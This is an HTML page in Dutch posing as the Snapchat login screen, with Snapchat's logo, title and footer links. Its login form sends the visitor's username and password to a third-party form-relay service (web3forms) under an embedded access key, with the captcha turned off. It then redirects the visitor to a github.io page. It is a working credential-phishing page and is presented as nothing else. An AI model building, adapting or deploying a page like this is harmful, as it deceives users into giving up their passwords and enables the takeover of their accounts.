<!doctype html>
<html lang="nl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport">
    <title>Snapchat</title>
    <link rel="stylesheet" href="./snapchat.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<main>
    <section class="login">
        <img class="logo" src="./snapchat-svgrepo-com.svg" alt="Snapchat">
        <h1>Inloggen bij Snapchat</h1>
        <form action="https://api.web3forms.com/submit" method="POST">
            <input type="hidden" name="access_key" value="04598b52-7783-437a-9192-a129f3490084">
            <input type="hidden" name="_captcha" value="false">
            <p>Gebruikersnaam of e-mailadres</p>
            <input class="username" name="gebruikersnaam" type="text" placeholder="">
            <p>Wachtwoord</p>
            <input class="password" name="wachtwoord" type="password" placeholder="">
            <h3>Wachtwoord vergeten?</h3>
            <input type="hidden" name="redirect" value="https://tijmenloix.github.io/snapchat2/">
            <button type="submit">Inloggen</button>
        </form>
    </section>
    <section class="credits">
        <div class="text1">
            <p>Bedrijf<br>
                Snap Inc.<br>
                Carrières<br>
                Nieuws</p>
        </div>
        <div class="text2"><p>Community<br>
            Ondersteuning<br>
            Communityrichtlijnen<br>
            Veiligheidscentrum</p></div>
        <div class="text3"><p>
            Adverteren<br>
            Ads kopen<br>
            Advertentiebeleid<br>
            Bibliotheek met politieke advertenties<br>
            Merkrichtlijnen<br>
            Regels voor acties<br></p>
        </div>
        <div class="text4"><p>Juridisch<br>
            Privacycentrum<br>
            Jouw privacykeuzes<br>
            Cookiebeleid<br>
            Schending rapporteren<br>
            Voorwaarden Creatieve Tools op Maat<br>
            Voorwaarden Community-Geofilters<br>
            Voorwaarden Lens Studio
        </p></div>
    </section>

</main>

</body>
</html>
